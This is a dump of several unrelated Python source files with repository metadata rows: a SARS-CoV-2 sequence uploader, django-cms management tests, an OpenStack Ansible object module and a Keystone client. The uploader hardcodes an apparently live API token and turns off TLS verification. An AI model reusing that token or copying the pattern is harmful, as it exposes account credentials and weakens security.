ARVADOS_API_TOKEN='2fbebpmbo3rw3x05ueu2i6nx70zhrsb1p22ycu3ry34m4x4462'
UPLOAD_PROJECT='lugli-j7d0g-n5clictpuvwk8aa'
def main():
parser = argparse.ArgumentParser(description='Upload SARS-CoV-19 sequences for analysis')
parser.add_argument('sequence', type=argparse.FileType('r'), help='sequence FASTA/FASTQ')
parser.add_argument('metadata', type=argparse.FileType('r'), help='sequence metadata json')
args = parser.parse_args()
api = arvados.api(host=ARVADOS_API_HOST, token=ARVADOS_API_TOKEN, insecure=True)
target = qc_fasta(args.sequence)
if not qc_metadata(args.metadata.name):
print("Failed metadata qc")
exit(1)
col = arvados.collection.Collection(api_client=api)
with col.open(target, "w") as f:
r = args.sequence.read(65536)
print(r[0:20])
while r:
f.write(r)
r = args.sequence.read(65536)
args.sequence.close()
print("Reading metadata")
with col.open("metadata.yaml", "w") as f:
r = args.metadata.read(65536)
print(r[0:20])
while r:
f.write(r)
r = args.metadata.read(65536)
args.metadata.close()
external_ip = urllib.request.urlopen('https://ident.me').read().decode('utf8')
properties = {
"upload_app": "bh20-seq-uploader",
"upload_ip": external_ip,
"upload_user": "%s@%s" % (getpass.getuser(), socket.gethostname())
}
col.save_new(owner_uuid=UPLOAD_PROJECT, name="Uploaded by %s from %s" %
(properties['upload_user'], properties['upload_ip']),
properties=properties, ensure_unique_name=True)
print("Done")
if __name__ == "__main__":
main()
| 29.656716 | 95 | 0.672874 |
4a225f76ea45b9976d450cb7f5c1422b03db903e | 26,875 | py | Python | cms/tests/test_management.py | Mario-Kart-Felix/django-cms | 6d68439fe7fd59d000f99e27c1f2135a3f9c816a | [
"BSD-3-Clause"
] | 1 | 2021-02-11T16:20:01.000Z | 2021-02-11T16:20:01.000Z | cms/tests/test_management.py | vlctt/django-cms | eeb86fd70c86b0cdac5f3959995b92de8d100771 | [
"BSD-3-Clause"
] | 2 | 2020-10-28T13:48:53.000Z | 2020-10-28T13:52:48.000Z | cms/tests/test_management.py | vlctt/django-cms | eeb86fd70c86b0cdac5f3959995b92de8d100771 | [
"BSD-3-Clause"
] | 1 | 2021-07-26T14:43:54.000Z | 2021-07-26T14:43:54.000Z | import io
import uuid
from cms.test_utils.project.sampleapp.cms_apps import SampleApp
from cms.test_utils.util.context_managers import apphooks
from django.conf import settings
from django.contrib.sites.models import Site
from django.core import management
from django.core.management import CommandError
from django.test.utils import override_settings
from cms.api import create_page, add_plugin, create_title
from cms.management.commands.subcommands.list import plugin_report
from cms.models import Page, StaticPlaceholder
from cms.models.placeholdermodel import Placeholder
from cms.models.pluginmodel import CMSPlugin
from cms.test_utils.fixtures.navextenders import NavextendersFixture
from cms.test_utils.testcases import CMSTestCase
from djangocms_text_ckeditor.cms_plugins import TextPlugin
APPHOOK = "SampleApp"
PLUGIN = "TextPlugin"
TEST_INSTALLED_APPS = [
"django.contrib.auth",
"cms",
"menus",
"sekizai",
"treebeard",
] + settings.PLUGIN_APPS
if settings.AUTH_USER_MODEL == "emailuserapp.EmailUser":
TEST_INSTALLED_APPS.append("cms.test_utils.project.emailuserapp")
if settings.AUTH_USER_MODEL == "customuserapp.User":
TEST_INSTALLED_APPS.append("cms.test_utils.project.customuserapp")
class ManagementTestCase(CMSTestCase):
@override_settings(INSTALLED_APPS=TEST_INSTALLED_APPS)
def test_list_apphooks(self):
with apphooks(SampleApp):
out = io.StringIO()
create_page('Hello Title', "nav_playground.html", "en", apphook=APPHOOK)
self.assertEqual(Page.objects.filter(application_urls=APPHOOK).count(), 1)
management.call_command(
"cms",
"list",
"apphooks",
interactive=False,
stdout=out,
)
self.assertEqual(out.getvalue(), "SampleApp (draft)\n")
def test_uninstall_apphooks_without_apphook(self):
with apphooks():
out = io.StringIO()
management.call_command(
"cms",
"uninstall",
"apphooks",
APPHOOK,
interactive=False,
stdout=out,
)
self.assertEqual(out.getvalue(), "no 'SampleApp' apphooks found\n")
def test_fix_tree(self):
create_page("home", "nav_playground.html", "en")
page1 = create_page("page", "nav_playground.html", "en")
page1.node.depth = 3
page1.node.numchild = 4
page1.node.path = "00100010"
page1.node.save()
out = io.StringIO()
management.call_command('cms', 'fix-tree', interactive=False, stdout=out)
self.assertEqual(out.getvalue(), 'fixing page tree\nfixing plugin tree\nall done\n')
page1 = page1.reload()
self.assertEqual(page1.node.path, "0002")
self.assertEqual(page1.node.depth, 1)
self.assertEqual(page1.node.numchild, 0)
def test_fix_tree_regression_5641(self):
# ref: https://github.com/divio/django-cms/issues/5641
alpha = create_page("Alpha", "nav_playground.html", "en", published=True)
beta = create_page("Beta", "nav_playground.html", "en", published=False)
gamma = create_page("Gamma", "nav_playground.html", "en", published=False)
delta = create_page("Delta", "nav_playground.html", "en", published=True)
theta = create_page("Theta", "nav_playground.html", "en", published=True)
beta.move_page(alpha.node, position='last-child')
gamma.move_page(beta.node, position='last-child')
delta.move_page(gamma.node, position='last-child')
theta.move_page(delta.node, position='last-child')
out = io.StringIO()
management.call_command('cms', 'fix-tree', interactive=False, stdout=out)
tree = [
(alpha, '0001'),
(beta, '00010001'),
(gamma, '000100010001'),
(delta, '0001000100010001'),
(theta, '00010001000100010001'),
]
for page, path in tree:
self.assertEqual(page.node.path, path)
@override_settings(INSTALLED_APPS=TEST_INSTALLED_APPS)
def test_uninstall_apphooks_with_apphook(self):
with apphooks(SampleApp):
out = io.StringIO()
create_page('Hello Title', "nav_playground.html", "en", apphook=APPHOOK)
self.assertEqual(Page.objects.filter(application_urls=APPHOOK).count(), 1)
management.call_command(
"cms",
"uninstall",
"apphooks",
APPHOOK,
interactive=False,
stdout=out,
)
self.assertEqual(out.getvalue(), "1 'SampleApp' apphooks uninstalled\n")
self.assertEqual(Page.objects.filter(application_urls=APPHOOK).count(), 0)
@override_settings(INSTALLED_APPS=TEST_INSTALLED_APPS)
def test_list_plugins(self):
out = io.StringIO()
placeholder = Placeholder.objects.create(slot="test")
add_plugin(placeholder, TextPlugin, "en", body="en body")
add_plugin(placeholder, TextPlugin, "en", body="en body")
link_plugin = add_plugin(placeholder, "LinkPlugin", "en",
name="A Link", external_link="https://www.django-cms.org")
self.assertEqual(
CMSPlugin.objects.filter(plugin_type=PLUGIN).count(),
2)
self.assertEqual(
CMSPlugin.objects.filter(plugin_type="LinkPlugin").count(),
1)
# create a CMSPlugin with an unsaved instance
instanceless_plugin = CMSPlugin(language="en", plugin_type="TextPlugin")
instanceless_plugin.save()
# create a bogus CMSPlugin to simulate one which used to exist but
# is no longer installed
bogus_plugin = CMSPlugin(language="en", plugin_type="BogusPlugin")
bogus_plugin.save()
management.call_command('cms', 'list', 'plugins', interactive=False, stdout=out)
report = plugin_report()
# there should be reports for three plugin types
self.assertEqual(
len(report),
3)
# check the bogus plugin
bogus_plugins_report = report[0]
self.assertEqual(
bogus_plugins_report["model"],
None)
self.assertEqual(
bogus_plugins_report["type"],
u'BogusPlugin')
self.assertEqual(
bogus_plugins_report["instances"][0],
bogus_plugin)
# check the link plugin
link_plugins_report = report[1]
self.assertEqual(
link_plugins_report["model"],
link_plugin.__class__)
self.assertEqual(
link_plugins_report["type"],
u'LinkPlugin')
self.assertEqual(
link_plugins_report["instances"][0].get_plugin_instance()[0],
link_plugin)
# check the text plugins
text_plugins_report = report[2]
self.assertEqual(
text_plugins_report["model"],
TextPlugin.model)
self.assertEqual(
text_plugins_report["type"],
u'TextPlugin')
self.assertEqual(
len(text_plugins_report["instances"]),
3)
self.assertEqual(
text_plugins_report["instances"][2],
instanceless_plugin)
self.assertEqual(
text_plugins_report["unsaved_instances"],
[instanceless_plugin])
@override_settings(INSTALLED_APPS=TEST_INSTALLED_APPS)
def test_delete_orphaned_plugins(self):
placeholder = Placeholder.objects.create(slot="test")
add_plugin(placeholder, TextPlugin, "en", body="en body")
add_plugin(placeholder, TextPlugin, "en", body="en body")
add_plugin(placeholder, "LinkPlugin", "en",
name="A Link", external_link="https://www.django-cms.org")
instanceless_plugin = CMSPlugin(
language="en", plugin_type="TextPlugin")
instanceless_plugin.save()
# create a bogus CMSPlugin to simulate one which used to exist but
# is no longer installed
bogus_plugin = CMSPlugin(language="en", plugin_type="BogusPlugin")
bogus_plugin.save()
report = plugin_report()
# there should be reports for three plugin types
self.assertEqual(
len(report),
3)
# check the bogus plugin
bogus_plugins_report = report[0]
self.assertEqual(
len(bogus_plugins_report["instances"]),
1)
# check the link plugin
link_plugins_report = report[1]
self.assertEqual(
len(link_plugins_report["instances"]),
1)
# check the text plugins
text_plugins_report = report[2]
self.assertEqual(
len(text_plugins_report["instances"]),
3)
self.assertEqual(
len(text_plugins_report["unsaved_instances"]),
1)
out = io.StringIO()
management.call_command('cms', 'delete-orphaned-plugins', interactive=False, stdout=out)
report = plugin_report()
# there should be reports for two plugin types (one should have been deleted)
self.assertEqual(
len(report),
2)
# check the link plugin
link_plugins_report = report[0]
self.assertEqual(
len(link_plugins_report["instances"]),
1)
# check the text plugins
text_plugins_report = report[1]
self.assertEqual(
len(text_plugins_report["instances"]),
2)
self.assertEqual(
len(text_plugins_report["unsaved_instances"]),
0)
def test_uninstall_plugins_without_plugin(self):
out = io.StringIO()
management.call_command('cms', 'uninstall', 'plugins', PLUGIN, interactive=False, stdout=out)
self.assertEqual(out.getvalue(), "no 'TextPlugin' plugins found\n")
@override_settings(INSTALLED_APPS=TEST_INSTALLED_APPS)
def test_uninstall_plugins_with_plugin(self):
out = io.StringIO()
placeholder = Placeholder.objects.create(slot="test")
add_plugin(placeholder, TextPlugin, "en", body="en body")
self.assertEqual(CMSPlugin.objects.filter(plugin_type=PLUGIN).count(), 1)
management.call_command('cms', 'uninstall', 'plugins', PLUGIN, interactive=False, stdout=out)
self.assertEqual(out.getvalue(), "1 'TextPlugin' plugins uninstalled\n")
self.assertEqual(CMSPlugin.objects.filter(plugin_type=PLUGIN).count(), 0)
def test_publisher_public(self):
admin = self.get_superuser()
create_page(
'home',
published=True,
language='de',
template='nav_playground.html',
created_by=admin,
)
page_1 = create_page(
'página 1',
published=True,
language='de',
template='nav_playground.html',
created_by=admin,
)
page_1.unpublish('de')
page_2 = create_page(
'página 2',
published=True,
language='de',
template='nav_playground.html',
created_by=admin,
)
page_2.unpublish('de')
management.call_command(
'cms',
'publisher-publish',
'-l de',
'--unpublished',
interactive=False,
)
self.assertEqual(Page.objects.public().count(), 3)
class PageFixtureManagementTestCase(NavextendersFixture, CMSTestCase):
def _fill_page_body(self, page, lang):
ph_en = page.placeholders.get(slot="body")
# add misc plugins
mcol1 = add_plugin(ph_en, "MultiColumnPlugin", lang, position="first-child")
add_plugin(ph_en, "ColumnPlugin", lang, position="first-child", target=mcol1)
col2 = add_plugin(ph_en, "ColumnPlugin", lang, position="first-child", target=mcol1)
mcol2 = add_plugin(ph_en, "MultiColumnPlugin", lang, position="first-child", target=col2)
add_plugin(ph_en, "ColumnPlugin", lang, position="first-child", target=mcol2)
col4 = add_plugin(ph_en, "ColumnPlugin", lang, position="first-child", target=mcol2)
# add a *nested* link plugin
add_plugin(ph_en, "LinkPlugin", lang, target=col4,
name="A Link", external_link="https://www.django-cms.org")
static_placeholder = StaticPlaceholder(code=str(uuid.uuid4()), site_id=1)
static_placeholder.save()
add_plugin(static_placeholder.draft, "TextPlugin", lang, body="example content")
def setUp(self):
pages = Page.objects.drafts()
for page in pages:
self._fill_page_body(page, "en")
def test_copy_langs(self):
"""
Various checks here:
* plugins are exactly doubled, half per language with no orphaned plugin
* the bottom-most plugins in the nesting chain maintain the same position and the same content
* the top-most plugin are of the same type
"""
site = 1
number_start_plugins = CMSPlugin.objects.all().count()
out = io.StringIO()
management.call_command(
'cms', 'copy', 'lang', '--from-lang=en', '--to-lang=de', interactive=False, stdout=out
)
pages = Page.objects.on_site(site).drafts()
for page in pages:
self.assertEqual(set((u'en', u'de')), set(page.get_languages()))
# These asserts that no orphaned plugin exists
self.assertEqual(CMSPlugin.objects.all().count(), number_start_plugins*2)
self.assertEqual(CMSPlugin.objects.filter(language='en').count(), number_start_plugins)
self.assertEqual(CMSPlugin.objects.filter(language='de').count(), number_start_plugins)
root_page = Page.objects.get_home(site)
root_plugins = CMSPlugin.objects.filter(placeholder=root_page.placeholders.get(slot="body"))
first_plugin_en, _ = root_plugins.get(language='en', parent=None).get_plugin_instance()
first_plugin_de, _ = root_plugins.get(language='de', parent=None).get_plugin_instance()
self.assertEqual(first_plugin_en.plugin_type, first_plugin_de.plugin_type)
link_en, _ = root_plugins.get(language='en', plugin_type='LinkPlugin').get_plugin_instance()
link_de, _ = root_plugins.get(language='de', plugin_type='LinkPlugin').get_plugin_instance()
self.assertEqual(link_en.external_link, link_de.external_link)
self.assertEqual(link_en.get_position_in_placeholder(), link_de.get_position_in_placeholder())
stack_plugins = CMSPlugin.objects.filter(placeholder=StaticPlaceholder.objects.order_by('?')[0].draft)
stack_text_en, _ = stack_plugins.get(language='en', plugin_type='TextPlugin').get_plugin_instance()
stack_text_de, _ = stack_plugins.get(language='de', plugin_type='TextPlugin').get_plugin_instance()
self.assertEqual(stack_text_en.plugin_type, stack_text_de.plugin_type)
self.assertEqual(stack_text_en.body, stack_text_de.body)
def test_copy_langs_no_content(self):
"""
Various checks here:
* page structure is copied
* no plugin is copied
"""
site = 1
number_start_plugins = CMSPlugin.objects.all().count()
out = io.StringIO()
management.call_command(
'cms', 'copy', 'lang', '--from-lang=en', '--to-lang=de', '--skip-content',
interactive=False, stdout=out
)
pages = Page.objects.on_site(site).drafts()
for page in pages:
self.assertEqual(set((u'en', u'de')), set(page.get_languages()))
# These asserts that no orphaned plugin exists
self.assertEqual(CMSPlugin.objects.all().count(), number_start_plugins)
self.assertEqual(CMSPlugin.objects.filter(language='en').count(), number_start_plugins)
self.assertEqual(CMSPlugin.objects.filter(language='de').count(), 0)
root_page = Page.objects.get_home(site)
root_plugins = CMSPlugin.objects.filter(
placeholder=root_page.placeholders.get(slot="body"))
first_plugin_en, _ = root_plugins.get(language='en', parent=None).get_plugin_instance()
first_plugin_de = None
with self.assertRaises(CMSPlugin.DoesNotExist):
first_plugin_de, _ = root_plugins.get(language='de', parent=None).get_plugin_instance()
self.assertIsNone(first_plugin_de)
stack_plugins = CMSPlugin.objects.filter(
placeholder=StaticPlaceholder.objects.order_by('?')[0].draft)
stack_text_en, _ = stack_plugins.get(language='en',
plugin_type='TextPlugin').get_plugin_instance()
with self.assertRaises(CMSPlugin.DoesNotExist):
stack_text_de, _ = stack_plugins.get(language='de',
plugin_type='TextPlugin').get_plugin_instance()
def test_copy_sites(self):
"""
Various checks here:
* plugins are exactly doubled, half per site with no orphaned plugin
* the bottom-most plugins in the nesting chain maintain the same position and the same content
* the top-most plugin are of the same type
"""
site_1_pk = 1
site_1 = Site.objects.get(pk=site_1_pk)
site_2 = Site.objects.create(name='site 2')
site_2_pk = site_2.pk
phs = []
for page in Page.objects.on_site(site_1_pk).drafts():
phs.extend(page.placeholders.values_list('pk', flat=True))
number_start_plugins = CMSPlugin.objects.filter(placeholder__in=phs).count()
out = io.StringIO()
management.call_command(
'cms', 'copy', 'site', '--from-site=%s' % site_1_pk, '--to-site=%s' % site_2_pk,
stdout=out
)
for page in Page.objects.on_site(site_1_pk).drafts():
page.publish('en')
for page in Page.objects.on_site(site_2_pk).drafts():
page.publish('en')
pages_1 = list(Page.objects.drafts().on_site(site_1).select_related('node').order_by('node__path'))
pages_2 = list(Page.objects.drafts().on_site(site_2).select_related('node').order_by('node__path'))
for index, page in enumerate(pages_1):
self.assertEqual(page.get_title('en'), pages_2[index].get_title('en'))
self.assertEqual(page.node.depth, pages_2[index].node.depth)
phs_1 = []
phs_2 = []
for page in Page.objects.on_site(site_1_pk).drafts():
phs_1.extend(page.placeholders.values_list('pk', flat=True))
for page in Page.objects.on_site(site_2_pk).drafts():
phs_2.extend(page.placeholders.values_list('pk', flat=True))
# These asserts that no orphaned plugin exists
self.assertEqual(CMSPlugin.objects.filter(placeholder__in=phs_1).count(), number_start_plugins)
self.assertEqual(CMSPlugin.objects.filter(placeholder__in=phs_2).count(), number_start_plugins)
root_page_1 = Page.objects.get_home(site_1)
root_page_2 = Page.objects.get_home(site_2)
root_plugins_1 = CMSPlugin.objects.filter(placeholder=root_page_1.placeholders.get(slot="body"))
root_plugins_2 = CMSPlugin.objects.filter(placeholder=root_page_2.placeholders.get(slot="body"))
first_plugin_1, _ = root_plugins_1.get(language='en', parent=None).get_plugin_instance()
first_plugin_2, _ = root_plugins_2.get(language='en', parent=None).get_plugin_instance()
self.assertEqual(first_plugin_1.plugin_type, first_plugin_2.plugin_type)
link_1, _ = root_plugins_1.get(language='en', plugin_type='LinkPlugin').get_plugin_instance()
link_2, _ = root_plugins_2.get(language='en', plugin_type='LinkPlugin').get_plugin_instance()
self.assertEqual(link_1.external_link, link_2.external_link)
self.assertEqual(link_1.get_position_in_placeholder(), link_2.get_position_in_placeholder())
def test_copy_existing_title(self):
"""
Even if a title already exists the copy is successfull, the original
title remains untouched
"""
site = 1
number_start_plugins = CMSPlugin.objects.all().count()
# create an empty title language
root_page = Page.objects.get_home(site)
create_title("de", "root page de", root_page)
out = io.StringIO()
management.call_command(
'cms', 'copy', 'lang', '--from-lang=en', '--to-lang=de', interactive=False, stdout=out
)
pages = Page.objects.on_site(site).drafts()
for page in pages:
self.assertEqual(set((u'en', u'de')), set(page.get_languages()))
# Original Title untouched
self.assertEqual("root page de", Page.objects.get_home(site).get_title("de"))
# Plugins still copied
self.assertEqual(CMSPlugin.objects.all().count(), number_start_plugins*2)
self.assertEqual(CMSPlugin.objects.filter(language='en').count(), number_start_plugins)
self.assertEqual(CMSPlugin.objects.filter(language='de').count(), number_start_plugins)
def test_copy_filled_placeholder(self):
"""
If an existing title in the target language has plugins in a placeholder
that placeholder is skipped
"""
site = 1
number_start_plugins = CMSPlugin.objects.all().count()
# create an empty title language
root_page = Page.objects.get_home(site)
create_title("de", "root page de", root_page)
ph = root_page.placeholders.get(slot="body")
add_plugin(ph, "TextPlugin", "de", body="Hello World")
out = io.StringIO()
management.call_command(
'cms', 'copy', 'lang', '--from-lang=en', '--to-lang=de', interactive=False, stdout=out
)
self.assertEqual(CMSPlugin.objects.filter(language='en').count(), number_start_plugins)
# one placeholder (with 7 plugins) is skipped, so the difference must be 6
self.assertEqual(CMSPlugin.objects.filter(language='de').count(), number_start_plugins-6)
def test_copy_filled_placeholder_force_copy(self):
"""
If an existing title in the target language has plugins in a placeholder
and the command is called with *force-copy*, the plugins are copied on
top of the existing one
"""
site = 1
number_start_plugins = CMSPlugin.objects.all().count()
# create an empty title language
root_page = Page.objects.get_home(site)
create_title("de", "root page de", root_page)
ph = root_page.placeholders.get(slot="body")
add_plugin(ph, "TextPlugin", "de", body="Hello World")
root_plugins = CMSPlugin.objects.filter(placeholder=ph)
text_de_orig, _ = root_plugins.get(language='de', plugin_type='TextPlugin').get_plugin_instance()
out = io.StringIO()
management.call_command(
'cms', 'copy', 'lang', '--from-lang=en', '--to-lang=de', '--force', interactive=False,
stdout=out
)
CMSPlugin.objects.filter(placeholder=root_page.placeholders.get(slot="body"))
self.assertEqual(CMSPlugin.objects.filter(language='en').count(), number_start_plugins)
# we have an existing plugin in one placeholder, so we have one more
self.assertEqual(CMSPlugin.objects.filter(language='de').count(), number_start_plugins+1)
def test_copy_from_non_existing_lang(self):
"""
If an existing title in the target language has plugins in a placeholder
and the command is called with *force-copy*, the plugins are copied on
top of the existing one
"""
site = 1
out = io.StringIO()
management.call_command(
'cms', 'copy', 'lang', '--from-lang=de', '--to-lang=fr', verbosity=3,
interactive=False, stdout=out
)
text = out.getvalue()
page_count = Page.objects.on_site(site).drafts().count() + 1
for idx in range(1, page_count):
self.assertTrue("Skipping page page%d, language de not defined" % idx in text)
def test_copy_site_safe(self):
"""
Check that copy of languages on one site does not interfere with other
sites
"""
site_other = 1
site_active = 2
origina_site1_langs = {}
number_start_plugins = CMSPlugin.objects.all().count()
site_obj = Site.objects.create(domain="sample2.com", name="sample2.com", pk=site_active)
for page in Page.objects.on_site(1).drafts():
origina_site1_langs[page.pk] = set(page.get_languages())
p1 = create_page('page1', published=True, in_navigation=True, language='de', template='nav_playground.html', site=site_obj)
create_page('page4', published=True, in_navigation=True, language='de', template='nav_playground.html', site=site_obj)
create_page('page2', published=True, in_navigation=True, parent=p1, language='de', template='nav_playground.html', site=site_obj)
for page in Page.objects.on_site(site_active).drafts():
self._fill_page_body(page, 'de')
number_site2_plugins = CMSPlugin.objects.all().count() - number_start_plugins
out = io.StringIO()
management.call_command(
'cms', 'copy', 'lang', '--from-lang=de', '--to-lang=fr', '--site=%s' % site_active,
interactive=False, stdout=out
)
for page in Page.objects.on_site(site_other).drafts():
self.assertEqual(origina_site1_langs[page.pk], set(page.get_languages()))
for page in Page.objects.on_site(site_active).drafts():
self.assertEqual(set(('de', 'fr')), set(page.get_languages()))
# plugins for site 1
self.assertEqual(CMSPlugin.objects.filter(language='en').count(), number_start_plugins)
# plugins for site 2 de
self.assertEqual(CMSPlugin.objects.filter(language='de').count(), number_site2_plugins)
# plugins for site 2 fr
self.assertEqual(CMSPlugin.objects.filter(language='fr').count(), number_site2_plugins)
# global number of plugins
self.assertEqual(CMSPlugin.objects.all().count(), number_start_plugins + number_site2_plugins*2)
def test_copy_bad_languages(self):
out = io.StringIO()
with self.assertRaises(CommandError) as command_error:
management.call_command(
'cms', 'copy', 'lang', '--from-lang=it', '--to-lang=fr', interactive=False,
stdout=out
)
self.assertEqual(str(command_error.exception), 'Both languages have to be present in settings.LANGUAGES and settings.CMS_LANGUAGES')
| 40.905632 | 140 | 0.63814 |
4a22604ed87eb6f35778b15756b9a5526a8c95d4 | 3,503 | py | Python | venv/lib/python3.6/site-packages/ansible_collections/openstack/cloud/plugins/modules/os_object.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | 1 | 2020-01-22T13:11:23.000Z | 2020-01-22T13:11:23.000Z | venv/lib/python3.6/site-packages/ansible_collections/openstack/cloud/plugins/modules/os_object.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | 12 | 2020-02-21T07:24:52.000Z | 2020-04-14T09:54:32.000Z | venv/lib/python3.6/site-packages/ansible_collections/openstack/cloud/plugins/modules/os_object.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | null | null | null | #!/usr/bin/python
# Copyright (c) 2015 Hewlett-Packard Development Company, L.P.
# Copyright (c) 2013, Benno Joy <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
DOCUMENTATION = '''
---
module: object
short_description: Create or Delete objects and containers from OpenStack
author: OpenStack Ansible SIG
description:
- Create or Delete objects and containers from OpenStack
options:
container:
description:
- The name of the container in which to create the object
required: true
type: str
name:
description:
- Name to be give to the object. If omitted, operations will be on
the entire container
required: false
type: str
filename:
description:
- Path to local file to be uploaded.
required: false
type: str
container_access:
description:
- desired container access level.
required: false
choices: ['private', 'public']
default: private
type: str
state:
description:
- Should the resource be present or absent.
choices: [present, absent]
default: present
type: str
requirements:
- "python >= 3.6"
- "openstacksdk"
extends_documentation_fragment:
- openstack.cloud.openstack
'''
EXAMPLES = '''
- name: "Create a object named 'fstab' in the 'config' container"
openstack.cloud.object:
cloud: mordred
state: present
name: fstab
container: config
filename: /etc/fstab
- name: Delete a container called config and all of its contents
openstack.cloud.object:
cloud: rax-iad
state: absent
container: config
'''
from ansible_collections.openstack.cloud.plugins.module_utils.openstack import OpenStackModule
class SwiftObjectModule(OpenStackModule):
argument_spec = dict(
name=dict(required=False, default=None),
container=dict(required=True),
filename=dict(required=False, default=None),
container_access=dict(default='private', choices=['private', 'public']),
state=dict(default='present', choices=['absent', 'present']),
)
module_kwargs = dict()
def process_object(
self, container, name, filename, container_access, **kwargs
):
changed = False
container_obj = self.conn.get_container(container)
if kwargs['state'] == 'present':
if not container_obj:
container_obj = self.conn.create_container(container)
changed = True
if self.conn.get_container_access(container) != container_access:
self.conn.set_container_access(container, container_access)
changed = True
if name:
if self.conn.is_object_stale(container, name, filename):
self.conn.create_object(container, name, filename)
changed = True
else:
if container_obj:
if name:
if self.conn.get_object_metadata(container, name):
self.conn.delete_object(container, name)
changed = True
else:
self.conn.delete_container(container)
changed = True
return changed
def run(self):
changed = self.process_object(**self.params)
self.exit_json(changed=changed)
def main():
module = SwiftObjectModule()
module()
if __name__ == "__main__":
main()
| 28.950413 | 94 | 0.632601 |
4a22611b96edc8fb81f01c74380c74116cf63516 | 5,600 | py | Python | collectd_openstack/common/keystone_light.py | ChameleonCloud/collectd-ceilometer-plugin | 37b700647f71786e08d54e898ef8f26e22a7e127 | [
"Apache-2.0"
] | null | null | null | collectd_openstack/common/keystone_light.py | ChameleonCloud/collectd-ceilometer-plugin | 37b700647f71786e08d54e898ef8f26e22a7e127 | [
"Apache-2.0"
] | null | null | null | collectd_openstack/common/keystone_light.py | ChameleonCloud/collectd-ceilometer-plugin | 37b700647f71786e08d54e898ef8f26e22a7e127 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
""" Lightweight (keystone) client for the OpenStack Identity API """
import logging
import requests
LOG = logging.getLogger(__name__)
class KeystoneException(Exception):
def __init__(self, message, exc=None, response=None):
if exc:
message += "\nReason: %s" % exc
super(KeystoneException, self).__init__(message)
self.response = response
self.exception = exc
class InvalidResponse(KeystoneException):
def __init__(self, exc, response):
super(InvalidResponse, self).__init__(
"Invalid response from ident", exc, response)
class MissingServices(KeystoneException):
def __init__(self, message, exc, response):
super(MissingServices, self).__init__(
"MissingServices: " + message, exc, response)
class ClientV3(object):
"""Light weight client for the OpenStack Identity API V3.
:param string username: Username for authentication.
:param string password: Password for authentication.
:param string tenant_id: Tenant id.
:param string tenant_name: Tenant name.
:param string auth_url: Keystone service endpoint for authorization.
"""
def __init__(self, auth_url, username, password=None, tenant_id=None, tenant_name=None, token=None):
"""Initialize a new client"""
self.auth_url = auth_url
self.username = username
self.password = password
self.tenant_id = tenant_id
self.tenant_name = tenant_name
self.token = token
self._auth_token = None
self._services = ()
self._services_by_name = {}
@property
def auth_token(self):
"""Return token string usable for X-Auth-Token """
# actualize token
self.refresh()
return self._auth_token
@property
def services(self):
"""Return list of services retrieved from identity server """
return self._services
def refresh(self):
"""Refresh token and services list (getting it from identity server) """
headers = {'Accept': 'application/json'}
url = self.auth_url.rstrip('/') + '/auth/tokens'
if self.token:
identity_params = {
'methods': ['token'],
'token': {
'id': self.token
}
}
else:
identity_params = {
'methods': ['password'],
'password': {
'user': {
'name': self.username,
'domain': {'id': 'default'},
'password': self.password
}
}
}
params = {
'auth': {
'identity': identity_params,
'scope': {
'project': {
'domain': {'id': 'default'}
}
}
}
}
if self.tenant_name:
params['auth']['scope']['project']['name'] = self.tenant_name
else:
params['auth']['scope']['project']['id'] = self.tenant_id
resp = requests.post(url, json=params, headers=headers)
resp_data = None
# processing response
try:
resp.raise_for_status()
resp_data = resp.json()['token']
self._services = tuple(resp_data['catalog'])
self._services_by_name = {
service['name']: service for service in self._services
}
self._auth_token = resp.headers['X-Subject-Token']
except (TypeError, KeyError, ValueError,
requests.exceptions.HTTPError) as e:
LOG.exception("Error processing response from keystone")
raise InvalidResponse(e, resp_data)
return resp_data
def get_service_endpoint(self, name, urlkey="internalURL", region=None):
"""Return url endpoint of service
possible values of urlkey = 'adminURL' | 'publicURL' | 'internalURL'
provide region if more endpoints are available
"""
try:
endpoints = self._services_by_name[name]['endpoints']
if not endpoints:
raise MissingServices("Missing name '%s' in received services"
% name,
None, self._services)
if region:
for ep in endpoints:
if ep['region'] == region and ep['interface'] in urlkey:
return ep["url"].rstrip('/')
else:
for ep in endpoints:
if ep['interface'] in urlkey:
return ep["url"].rstrip('/')
raise MissingServices("No valid endpoints found")
except (KeyError, ValueError) as e:
LOG.exception("Error while processing endpoints")
raise MissingServices("Missing data in received services",
e, self._services)
| 34.782609 | 104 | 0.56625 |
4a22628247779703738791c3c4f80f1f3c33c23b | 977 | py | Python | Anime-hash-checker.py | liamnoone/Python | 999cf3c2be622a736ffa61c83096eeda13d79bd4 | [
"MIT"
] | 2 | 2015-06-13T17:52:28.000Z | 2015-06-14T05:46:51.000Z | Anime-hash-checker.py | liamnoone/Python | 999cf3c2be622a736ffa61c83096eeda13d79bd4 | [
"MIT"
] | null | null | null | Anime-hash-checker.py | liamnoone/Python | 999cf3c2be622a736ffa61c83096eeda13d79bd4 | [
"MIT"
] | null | null | null | import re
import os
from CRC import CRC
def Process(folder):
total = 0
if (os.path.exists(folder)):
for file in os.listdir(folder):
hash = ""
try:
providedHash = re.search("\[([A-Z0-9]{8})\]", file).group(1)
except AttributeError:
continue
if providedHash is None:
continue
else:
total += 1
print(file, providedHash)
# Calculate hash
hash = CRC(os.path.join(folder, file))
if hash == providedHash:
print("File name matches CRC32 hash:", file)
else:
print("Invalid file: ..." +
file[-30:] + ". Calclated hash is", providedHash)
print("\nFinished:", total, "files processed.")
else:
print("Directory does not exist")
if __name__ == "__main__":
Process("D:/test")
| 27.138889 | 76 | 0.474923 |
4a2262d6e81a87833f9ca9fa63cf045efe87f758 | 5,266 | py | Python | adafruit_focaltouch.py | dsudduth/Adafruit_CircuitPython_FocalTouch | 3b4bf5246ecea9d88a5143ef7a3805fbae395819 | [
"MIT"
